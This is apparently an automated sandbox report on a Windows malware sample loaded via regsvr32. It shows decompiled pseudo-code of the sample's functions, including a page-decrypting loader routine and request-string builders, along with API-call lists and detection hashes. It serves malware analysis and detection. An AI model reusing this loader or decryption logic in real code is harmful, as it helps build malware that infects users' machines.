                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
• Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                  • String ID:
                                                  • API String ID: 3832013932-0
                                                  • Opcode ID: 0d4b06996ce339e6961b7f94dd01956b5ce28db957ce30150c2c0787af87b6ba
                                                  • Instruction ID: 5ecd6691f6526f964d3504fe638bab1c9395efaea03234fcc49a414a008102b1
                                                  • Opcode Fuzzy Hash: 0d4b06996ce339e6961b7f94dd01956b5ce28db957ce30150c2c0787af87b6ba
                                                  • Instruction Fuzzy Hash: 26F082331016A0FBD7295FA0AC8CF9FBF69FB28711F004404F6819A060C7308A08ABA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph (graph image omitted)
                                                  C-Code - Quality: 57%
                                                  			E00C8225B(signed int __edx) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				CHAR* _v16;
                                                  				long _v20;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				CHAR* _t22;
                                                  				CHAR* _t25;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				CHAR* _t36;
                                                  				CHAR* _t42;
                                                  				CHAR* _t43;
                                                  				CHAR* _t44;
                                                  				CHAR* _t46;
                                                  				void* _t49;
                                                  				void* _t51;
                                                  				CHAR* _t54;
                                                  				signed char _t56;
                                                  				intOrPtr _t58;
                                                  				signed int _t59;
                                                  				void* _t62;
                                                  				CHAR* _t65;
                                                  				CHAR* _t66;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  
                                                  				_t61 = __edx;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_t21 = E00C8550E();
                                                  				if(_t21 != 0) {
                                                  					_t59 =  *0xc8d25c; // 0x4000000a
                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                  					 *0xc8d25c = (_t59 & 0xf0000000) + _t21;
                                                  				}
                                                  				_t22 =  *0xc8d164(0, 2);
                                                  				_v16 = _t22;
                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                  					_t25 = E00C83D0D( &_v8,  &_v20); // executed
                                                  					_t54 = _t25;
                                                  					_t26 =  *0xc8d27c; // 0x41a5a8
                                                  					if( *0xc8d25c > 5) {
                                                  						_t8 = _t26 + 0xc8e5cd; // 0x4d283a53
                                                  						_t27 = _t8;
                                                  					} else {
                                                  						_t7 = _t26 + 0xc8ea15; // 0x44283a44
                                                  						_t27 = _t7;
                                                  					}
                                                  					E00C81BF4(_t27, _t27);
                                                  					_t31 = E00C81B2F(_t61,  &_v20,  &_v12); // executed
                                                  					if(_t31 == 0) {
                                                  						CloseHandle(_v20);
                                                  					}
                                                  					_t62 = 5;
                                                  					if(_t54 != _t62) {
                                                  						 *0xc8d270 =  *0xc8d270 ^ 0x81bbe65d;
                                                  						_t32 = E00C82049(0x60);
                                                  						__eflags = _t32;
                                                  						 *0xc8d32c = _t32;
                                                  						if(_t32 == 0) {
                                                  							_push(8);
                                                  							_pop(0);
                                                  						} else {
                                                  							memset(_t32, 0, 0x60);
                                                  							_t49 =  *0xc8d32c; // 0x10a95b0
                                                  							_t68 = _t68 + 0xc;
                                                  							__imp__(_t49 + 0x40);
                                                  							_t51 =  *0xc8d32c; // 0x10a95b0
                                                  							 *_t51 = 0xc8e836;
                                                  						}
                                                  						__eflags = 0;
                                                  						_t54 = 0;
                                                  						if(0 == 0) {
                                                  							_t36 = RtlAllocateHeap( *0xc8d238, 0, 0x43);
                                                  							__eflags = _t36;
                                                  							 *0xc8d2c4 = _t36;
                                                  							if(_t36 == 0) {
                                                  								_push(8);
                                                  								_pop(0);
                                                  							} else {
                                                  								_t56 =  *0xc8d25c; // 0x4000000a
                                                  								_t61 = _t56 & 0x000000ff;
                                                  								_t58 =  *0xc8d27c; // 0x41a5a8
                                                  								_t13 = _t58 + 0xc8e55a; // 0x697a6f4d
                                                  								_t55 = _t13;
                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xc8c2a7);
                                                  							}
                                                  							__eflags = 0;
                                                  							_t54 = 0;
                                                  							if(0 == 0) {
                                                  								asm("sbb eax, eax");
                                                  								E00C8269C( ~_v8 &  *0xc8d270, 0xc8d00c); // executed
                                                  								_t42 = E00C84094(_t55); // executed
                                                  								_t54 = _t42;
                                                  								__eflags = _t54;
                                                  								if(_t54 != 0) {
                                                  									goto L30;
                                                  								}
                                                  								_t43 = E00C896A4(_t55); // executed
                                                  								__eflags = _t43;
                                                  								if(_t43 != 0) {
                                                  									__eflags = _v8;
                                                  									_t65 = _v12;
                                                  									if(_v8 != 0) {
                                                  										L29:
                                                  										_t44 = E00C86786(_t61, _t65, _v8); // executed
                                                  										_t54 = _t44;
                                                  										goto L30;
                                                  									}
                                                  									__eflags = _t65;
                                                  									if(__eflags == 0) {
                                                  										goto L30;
                                                  									}
                                                  									_t46 = E00C83DD9(__eflags,  &(_t65[4])); // executed
                                                  									_t54 = _t46;
                                                  									__eflags = _t54;
                                                  									if(_t54 == 0) {
                                                  										goto L30;
                                                  									}
                                                  									goto L29;
                                                  								}
                                                  								_t54 = 8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t66 = _v12;
                                                  						if(_t66 == 0) {
                                                  							L30:
                                                  							if(_v16 == 0 || _v16 == 1) {
                                                  								 *0xc8d160();
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_t67 =  &(_t66[4]);
                                                  						do {
                                                  						} while (E00C8A501(_t62, _t67, 0, 1) == 0x4c7);
                                                  					}
                                                  					goto L30;
                                                  				} else {
                                                  					_t54 = _t22;
                                                  					L34:
                                                  					return _t54;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00C8550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,00C82274,00000000,00000000), ref: 00C8551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00C822F1
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • memset.NTDLL ref: 00C82340
                                                  • RtlInitializeCriticalSection.NTDLL(010A9570), ref: 00C82351
                                                    • Part of subcall function 00C83DD9: memset.NTDLL ref: 00C83DEE
                                                    • Part of subcall function 00C83DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C83E22
                                                    • Part of subcall function 00C83DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00C83E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00C8237C
                                                  • wsprintfA.USER32 ref: 00C823AC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 499a07449b292ec8f611185e7b34cef26b7bdf3724ac9ac07f9a607b42b44afa
                                                  • Instruction ID: a44c4eef1efb110f36ac07ec0ca73e51b58103f0ab65a6536c0a811abd9566eb
                                                  • Opcode Fuzzy Hash: 499a07449b292ec8f611185e7b34cef26b7bdf3724ac9ac07f9a607b42b44afa
                                                  • Instruction Fuzzy Hash: 7C510471A00214ABDB20BBA5DC8DF6E37BCAB4471CF00442AF512E7191E7B4DE40AB6C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 00C83B46
                                                  • SysAllocString.OLEAUT32(00C81885), ref: 00C83B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C83B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C83BAB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 8d5a14fd48c1fccb914f4704f52620a983bccefbb4b9cbf7182796c3ed0c055b
                                                  • Instruction ID: 7f637b8a94353cfafe9f7a8d77ecf54b571184055dbc7426fdca9166c3ecdbf6
                                                  • Opcode Fuzzy Hash: 8d5a14fd48c1fccb914f4704f52620a983bccefbb4b9cbf7182796c3ed0c055b
                                                  • Instruction Fuzzy Hash: B8313BB1900149EFCB05EF98D8C48AE7BB9FF48344B10846EF51AA7210D7359A85CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E005E18F4(void* __edi, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				unsigned int _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				void* _v36;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				intOrPtr _t39;
                                                  				void* _t46;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t50;
                                                  				signed int _t59;
                                                  				signed int _t61;
                                                  				intOrPtr _t66;
                                                  				intOrPtr _t77;
                                                  				void* _t78;
                                                  				signed int _t80;
                                                  
                                                  				_t77 =  *0x5e4130;
                                                  				_t39 = E005E1F5D(_t77,  &_v20,  &_v12);
                                                  				_v16 = _t39;
                                                  				if(_t39 == 0) {
                                                  					asm("sbb ebx, ebx");
                                                  					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                  					_t78 = _t77 + _v20;
                                                  					_v36 = _t78;
                                                  					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                  					_v24 = _t46;
                                                  					if(_t46 == 0) {
                                                  						_v16 = 8;
                                                  					} else {
                                                  						_t61 = 0;
                                                  						if(_t59 <= 0) {
                                                  							_t47 =  *0x5e414c;
                                                  						} else {
                                                  							_t66 = _a4;
                                                  							_t50 = _t46 - _t78;
                                                  							_t11 = _t66 + 0x5e51a7; // 0x5e51a7
                                                  							_v28 = _t50;
                                                  							_v32 = _t50 + _t11;
                                                  							_v8 = _t78;
                                                  							while(1) {
                                                  								asm("movsd");
                                                  								asm("movsd");
                                                  								asm("movsd");
                                                  								_t19 = _t61 + 1; // 0x2
                                                  								_t80 = _t19;
                                                  								E005E18C4(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                  								_t64 = _v32;
                                                  								_v8 = _v8 + 0x1000;
                                                  								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                  								_t61 = _t80;
                                                  								 *0x5e414c = _t47;
                                                  								if(_t61 >= _t59) {
                                                  									break;
                                                  								}
                                                  								_t50 = _v28;
                                                  							}
                                                  						}
                                                  						if(_t47 != 0x63699bc3) {
                                                  							_v16 = 0xc;
                                                  						} else {
                                                  							memcpy(_v36, _v24, _v12);
                                                  						}
                                                  						VirtualFree(_v24, 0, 0x8000); // executed
                                                  					}
                                                  				}
                                                  				return _v16;
			}

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,005E167D,00003000,00000004,?,?,005E167D,00000000), ref: 005E194A
                                                  • memcpy.NTDLL(?,?,005E167D,?,?,005E167D,00000000), ref: 005E19DC
                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,005E167D,00000000), ref: 005E19F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
• Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocFreememcpy
                                                  • String ID: Mar 9 2021
                                                  • API String ID: 4010158826-2159264323
                                                  • Opcode ID: ad371490977d3dce6faaafa4f33f38985e7fc4ceec7383803cbcf9af3e7b42a8
                                                  • Instruction ID: 64f389db5c04c51f276c751c121fadcbf0f9e36cb35381e56361efaa2f6e6af7
                                                  • Opcode Fuzzy Hash: ad371490977d3dce6faaafa4f33f38985e7fc4ceec7383803cbcf9af3e7b42a8
                                                  • Instruction Fuzzy Hash: F2315071E0065A9FCF08CF9AC885AAEBBB5BF48304F108168E545EB251D771AA45CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E00C81A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                  				intOrPtr _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				intOrPtr _t26;
                                                  				intOrPtr* _t28;
                                                  				intOrPtr _t31;
                                                  				intOrPtr* _t32;
                                                  				void* _t39;
                                                  				int _t46;
                                                  				intOrPtr* _t47;
                                                  				int _t48;
                                                  
                                                  				_t47 = __eax;
                                                  				_push( &_v12);
                                                  				_push(__eax);
                                                  				_t39 = 0;
                                                  				_t46 = 0; // executed
                                                  				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                  				_v8 = _t26;
                                                  				if(_t26 < 0) {
                                                  					L13:
                                                  					return _v8;
                                                  				}
                                                  				if(_v12 == 0) {
                                                  					Sleep(0xc8);
                                                  					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                  				}
                                                  				if(_v8 >= _t39) {
                                                  					_t28 = _v12;
                                                  					if(_t28 != 0) {
                                                  						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                  						_v8 = _t31;
                                                  						if(_t31 >= 0) {
                                                  							_t46 = lstrlenW(_v16);
                                                  							if(_t46 != 0) {
                                                  								_t46 = _t46 + 1;
                                                  								_t48 = _t46 + _t46;
                                                  								_t39 = E00C82049(_t48);
                                                  								if(_t39 == 0) {
                                                  									_v8 = 0x8007000e;
                                                  								} else {
                                                  									memcpy(_t39, _v16, _t48);
                                                  								}
                                                  								__imp__#6(_v16);
                                                  							}
                                                  						}
                                                  						_t32 = _v12;
                                                  						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                  					}
                                                  					 *_a4 = _t39;
                                                  					 *_a8 = _t46 + _t46;
                                                  				}
                                                  				goto L13;
			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 27dfd6f5551703c795535b7a89cd4816fb54083e82f741838ae71091d2484683
                                                  • Instruction ID: 6398dd2fee2082c849f5d1cfccc4a7c1fef2b6c0fde9ec8d82fd70876293180f
                                                  • Opcode Fuzzy Hash: 27dfd6f5551703c795535b7a89cd4816fb54083e82f741838ae71091d2484683
                                                  • Instruction Fuzzy Hash: F42171B5A00209EFCB10EFA8D884EEEBBF9FF48355B144169E805E7210E730DA45DB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E00C894A9(char* __eax) {
                                                  				char* _t8;
                                                  				intOrPtr _t12;
                                                  				char* _t21;
                                                  				signed int _t23;
                                                  				char* _t24;
                                                  				signed int _t26;
                                                  				void* _t27;
                                                  
                                                  				_t21 = __eax;
                                                  				_push(0x20);
                                                  				_t23 = 1;
                                                  				_push(__eax);
                                                  				while(1) {
                                                  					_t8 = StrChrA();
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_t23 = _t23 + 1;
                                                  					_push(0x20);
                                                  					_push( &(_t8[1]));
                                                  				}
                                                  				_t12 = E00C82049(_t23 << 2);
                                                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                  				if(_t12 != 0) {
                                                  					StrTrimA(_t21, 0xc8c2a4); // executed
                                                  					_t26 = 0;
                                                  					do {
                                                  						_t24 = StrChrA(_t21, 0x20);
                                                  						if(_t24 != 0) {
                                                  							 *_t24 = 0;
                                                  							_t24 =  &(_t24[1]);
                                                  							StrTrimA(_t24, 0xc8c2a4);
                                                  						}
                                                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                  						_t26 = _t26 + 1;
                                                  						_t21 = _t24;
                                                  					} while (_t24 != 0);
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                  				}
                                                  				return 0;
			}

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,010A95AC,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894C3
                                                  • StrTrimA.KERNELBASE(?,00C8C2A4,00000002,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894ED
                                                  • StrTrimA.SHLWAPI(00000001,00C8C2A4,?,00C823DE,?,00C87634,010A95AC,?,00C823DE), ref: 00C894FF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
• Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
• Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
• Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: c885044292d23ac8770c14ddfe6c6adb9a9de48caeac468ee9d92a7fd556f095
                                                  • Instruction ID: 24a90f39c65545c384a835804bb1480f1b62591baf1c94491e1f64aebe907502
                                                  • Opcode Fuzzy Hash: c885044292d23ac8770c14ddfe6c6adb9a9de48caeac468ee9d92a7fd556f095
                                                  • Instruction Fuzzy Hash: CE01B5716053116FD331AF698C89F3B7B98EF86B68F160518F851C7280DB70CC0297A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E005E111A(void* __ecx, char _a4) {
                                                  				long _t3;
                                                  				int _t4;
                                                  				int _t9;
                                                  				void* _t13;
                                                  
                                                  				_t13 = GetCurrentThread();
                                                  				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                  				if(_t3 != 0) {
                                                  					SetThreadPriority(_t13, 0xffffffff); // executed
                                                  				}
                                                  				_t4 = E005E163F(_a4); // executed
                                                  				_t9 = _t4;
                                                  				if(_t9 == 0) {
                                                  					SetThreadPriority(_t13, _t4);
                                                  				}
                                                  				asm("lock xadd [eax], ecx");
                                                  				return _t9;
			}

                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 005E111D
                                                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 005E1128
                                                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 005E113B
                                                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 005E114E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
• Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Thread$Priority$AffinityCurrentMask
                                                  • String ID:
                                                  • API String ID: 1452675757-0
                                                  • Opcode ID: 33a83d6eb5c873a46c9c4e6bbb8b16f684bb809f98140537dfce99a3eb9d76b8
                                                  • Instruction ID: 2ac0bb2c7d630a735f9cb9535a4fbbc268239ad0a98d638e14ae2a27a91f8b93
                                                  • Opcode Fuzzy Hash: 33a83d6eb5c873a46c9c4e6bbb8b16f684bb809f98140537dfce99a3eb9d76b8
                                                  • Instruction Fuzzy Hash: F1E09B312056516BD71D672A5C8DE6B6B5CEFA13307010235F550D72D0CB649D0595A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C873FD(void* __edx) {
                                                  				void* _v8;
                                                  				int _v12;
                                                  				WCHAR* _v16;
                                                  				void* __esi;
                                                  				void* _t23;
                                                  				intOrPtr _t24;
                                                  				void* _t26;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t38;
                                                  				intOrPtr _t42;
                                                  				void* _t45;
                                                  				void* _t50;
                                                  				void* _t55;
                                                  
                                                  				_t50 = __edx;
                                                  				_v12 = 0;
                                                  				_t23 = E00C8A72D(0,  &_v8); // executed
                                                  				if(_t23 != 0) {
                                                  					_v8 = 0;
                                                  				}
                                                  				_t24 =  *0xc8d27c; // 0x41a5a8
                                                  				_t4 = _t24 + 0xc8ede0; // 0x10a9388
                                                  				_t5 = _t24 + 0xc8ed88; // 0x4f0053
                                                  				_t26 = E00C81262( &_v16, _v8, _t5, _t4); // executed
                                                  				_t45 = _t26;
                                                  				if(_t45 == 0) {
                                                  					StrToIntExW(_v16, 0,  &_v12);
                                                  					_t45 = 8;
                                                  					if(_v12 < _t45) {
                                                  						_t45 = 1;
                                                  						__eflags = 1;
                                                  					} else {
                                                  						_t32 =  *0xc8d27c; // 0x41a5a8
                                                  						_t11 = _t32 + 0xc8edd4; // 0x10a937c
                                                  						_t48 = _t11;
                                                  						_t12 = _t32 + 0xc8ed88; // 0x4f0053
                                                  						_t55 = E00C87CB8(_t11, _t12, _t11);
                                                  						_t59 = _t55;
                                                  						if(_t55 != 0) {
                                                  							_t35 =  *0xc8d27c; // 0x41a5a8
                                                  							_t13 = _t35 + 0xc8ee1e; // 0x30314549
                                                  							if(E00C889D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                  								_t61 =  *0xc8d25c - 6;
                                                  								if( *0xc8d25c <= 6) {
                                                  									_t42 =  *0xc8d27c; // 0x41a5a8
                                                  									_t15 = _t42 + 0xc8ec2a; // 0x52384549
                                                  									E00C889D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                  								}
                                                  							}
                                                  							_t38 =  *0xc8d27c; // 0x41a5a8
                                                  							_t17 = _t38 + 0xc8ee18; // 0x10a93c0
                                                  							_t18 = _t38 + 0xc8edf0; // 0x680043
                                                  							_t45 = E00C82659(_v8, 0x80000001, _t55, _t18, _t17);
                                                  							HeapFree( *0xc8d238, 0, _t55);
                                                  						}
                                                  					}
                                                  					HeapFree( *0xc8d238, 0, _v16);
                                                  				}
                                                  				_t54 = _v8;
                                                  				if(_v8 != 0) {
                                                  					E00C81F99(_t54);
                                                  				}
                                                  				return _t45;
                                                  			}

                                                  APIs
                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,010A9388,00000000,?,7519F710,00000000,7519F730), ref: 00C8744C
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,010A93C0,?,00000000,30314549,00000014,004F0053,010A937C), ref: 00C874E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C86814), ref: 00C874FB
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 0c7179a1fa370b1d5edeb077ad952c3a23156157ac43480ce0e5cafc068dfddb
                                                  • Instruction ID: 706bdbcbafdac43ea150a5c14faabc2b8667436c1ba769789dfff95f01846f5e
                                                  • Opcode Fuzzy Hash: 0c7179a1fa370b1d5edeb077ad952c3a23156157ac43480ce0e5cafc068dfddb
                                                  • Instruction Fuzzy Hash: 16316D72901118BFDB11EBA0DC85FAE7BACEB44318F2501A6B611A7161E770DE05EF68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 54%
                                                  			E00C88504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				void* _v8;
                                                  				void* __edi;
                                                  				intOrPtr _t18;
                                                  				void* _t24;
                                                  				void* _t25;
                                                  				void* _t30;
                                                  				void* _t37;
                                                  				void* _t40;
                                                  				intOrPtr _t42;
                                                  
                                                  				_t32 = __ecx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t42 =  *0xc8d340; // 0x10a8d39
                                                  				_push(0x800);
                                                  				_push(0);
                                                  				_push( *0xc8d238);
                                                  				if( *0xc8d24c >= 5) {
                                                  					if(RtlAllocateHeap() == 0) {
                                                  						L6:
                                                  						_t30 = 8;
                                                  						L7:
                                                  						if(_t30 != 0) {
                                                  							L10:
                                                  							 *0xc8d24c =  *0xc8d24c + 1;
                                                  							L11:
                                                  							return _t30;
                                                  						}
                                                  						_t44 = _a4;
                                                  						_t40 = _v8;
                                                  						 *_a16 = _a4;
                                                  						 *_a20 = E00C82496(_t44, _t40); // executed
                                                  						_t18 = E00C8A66E(_t37, _t40, _t44); // executed
                                                  						if(_t18 != 0) {
                                                  							 *_a8 = _t40;
                                                  							 *_a12 = _t18;
                                                  							if( *0xc8d24c < 5) {
                                                  								 *0xc8d24c =  *0xc8d24c & 0x00000000;
                                                  							}
                                                  							goto L11;
                                                  						}
                                                  						_t30 = 0xbf;
                                                  						E00C8A1B0();
                                                  						RtlFreeHeap( *0xc8d238, 0, _t40); // executed
                                                  						goto L10;
                                                  					}
                                                  					_t24 = E00C8A279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                                                  					L5:
                                                  					_t30 = _t24;
                                                  					goto L7;
                                                  				}
                                                  				_t25 = RtlAllocateHeap(); // executed
                                                  				if(_t25 == 0) {
                                                  					goto L6;
                                                  				}
                                                  				_t24 = E00C88B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
                                                  				goto L5;
                                                  			}

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C88528
                                                    • Part of subcall function 00C88B94: GetTickCount.KERNEL32 ref: 00C88BA8
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88BF8
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88C15
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88C41
                                                    • Part of subcall function 00C88B94: HeapFree.KERNEL32(00000000,?), ref: 00C88C53
                                                    • Part of subcall function 00C88B94: wsprintfA.USER32 ref: 00C88C74
                                                    • Part of subcall function 00C88B94: HeapFree.KERNEL32(00000000,?), ref: 00C88C84
                                                    • Part of subcall function 00C88B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C88CB2
                                                    • Part of subcall function 00C88B94: GetTickCount.KERNEL32 ref: 00C88CC3
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00C88546
                                                  • RtlFreeHeap.NTDLL(00000000,00000002,00C8685F,?,00C8685F,00000002,?,?,00C82417,?), ref: 00C885A3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
